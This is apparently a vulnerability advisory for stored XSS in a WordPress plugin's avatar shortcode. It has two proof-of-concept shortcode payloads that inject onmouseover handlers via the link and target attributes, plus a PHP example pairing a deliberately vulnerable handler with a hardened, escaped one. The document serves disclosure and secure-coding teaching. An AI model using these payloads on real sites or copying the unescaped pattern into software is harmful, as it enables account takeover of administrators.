Description
The plugin does not properly sanitize and escape some of its shortcode attributes (the link and target attributes of its avatar shortcode), which could allow relatively low-privileged users such as Contributors to conduct Stored XSS attacks against users who view or review the post, including Administrators.
As a Contributor (or any higher role), create a new post and add one of the following shortcodes:
[avatar user="admin" size="96" align="left" link='" onmouseover="alert(/XSS/)"' /]
[avatar user="admin" size="96" align="left" link="/" target='" onmouseover="alert(/XSS/)"' /]
Save the post so that it is pending review.
When an Administrator previews or reviews the post and moves the mouse over the rendered avatar link, the injected onmouseover handler runs in the Administrator's browser, since the attribute value is written into the link's HTML unescaped.
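The following PHP is an added example, not the plugin's own code (the advisory does not show the affected handler). It is a minimal stand-in for a shortcode handler with the same attribute names (user, size, align, link, target) that reproduces the flaw on the first PoC shortcode's attributes and shows the hardened form: esc_url() for the href, esc_attr() for other attribute values, and allowlists for align and target. The img markup, the avatar path, the escaping fallbacks used when the file is run outside WordPress, and the function names are all assumptions for illustration.

```php
<?php
// Added example, not the plugin's code. Runs stand-alone with `php avatar_poc.php`;
// inside WordPress the real esc_attr()/esc_url()/shortcode_atts() are used instead
// of the fallbacks below.
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
    }
}
if (!function_exists('esc_url')) {
    // Only the attribute-safety part of esc_url() is modelled: drop script
    // schemes and encode quotes so the value cannot close the href attribute.
    function esc_url($url) {
        $url = trim((string) $url);
        if (preg_match('/^(javascript|data|vbscript):/i', $url)) {
            return '';
        }
        return htmlspecialchars($url, ENT_QUOTES, 'UTF-8');
    }
}
if (!function_exists('shortcode_atts')) {
    function shortcode_atts($pairs, $atts) {
        $out = array();
        foreach ($pairs as $name => $default) {
            $out[$name] = array_key_exists($name, $atts) ? $atts[$name] : $default;
        }
        return $out;
    }
}

function avatar_defaults() {
    return array('user' => '', 'size' => '96', 'align' => 'none', 'link' => '', 'target' => '');
}

// Vulnerable pattern (assumed): attribute values concatenated straight into HTML.
function avatar_shortcode_vulnerable($atts) {
    $a = shortcode_atts(avatar_defaults(), $atts);
    $img = '<img class="avatar align' . $a['align'] . '" src="/avatar/' . $a['user'] . '.png"'
         . ' width="' . $a['size'] . '" height="' . $a['size'] . '" />';
    if ($a['link'] === '') {
        return $img;
    }
    $target = $a['target'] !== '' ? ' target="' . $a['target'] . '"' : '';
    // link='" onmouseover="alert(/XSS/)"' closes href and adds an event handler.
    return '<a href="' . $a['link'] . '"' . $target . '>' . $img . '</a>';
}

// Hardened pattern: escape every attribute value, cast numbers, allowlist tokens.
function avatar_shortcode_hardened($atts) {
    $a = shortcode_atts(avatar_defaults(), $atts);
    $size  = max(1, min(512, (int) $a['size']));
    $align = in_array($a['align'], array('left', 'right', 'center', 'none'), true) ? $a['align'] : 'none';
    $img = '<img class="avatar align' . esc_attr($align) . '" src="/avatar/' . esc_attr($a['user']) . '.png"'
         . ' width="' . $size . '" height="' . $size . '" />';
    $href = esc_url($a['link']);
    if ($href === '') {
        return $img;
    }
    // target can only ever be a known token, so an allowlist beats escaping alone.
    $target = in_array($a['target'], array('_blank', '_self'), true) ? ' target="' . $a['target'] . '"' : '';
    return '<a href="' . $href . '"' . $target . '>' . $img . '</a>';
}

// Constructed input: the attributes of the advisory's first PoC shortcode after
// WordPress has parsed the single-quoted link value.
$poc_atts = array(
    'user'  => 'admin',
    'size'  => '96',
    'align' => 'left',
    'link'  => '" onmouseover="alert(/XSS/)"',
);

echo "vulnerable: " . avatar_shortcode_vulnerable($poc_atts) . "\n";
echo "hardened:   " . avatar_shortcode_hardened($poc_atts) . "\n";
```

The vulnerable output contains `<a href="" onmouseover="alert(/XSS/)""`, which browsers accept despite the stray quote, so the handler fires on hover; the hardened output keeps the whole value inside href as `&quot; onmouseover=&quot;alert(/XSS/)&quot;`. The second PoC, which injects through target, is stopped by the allowlist for the same reason.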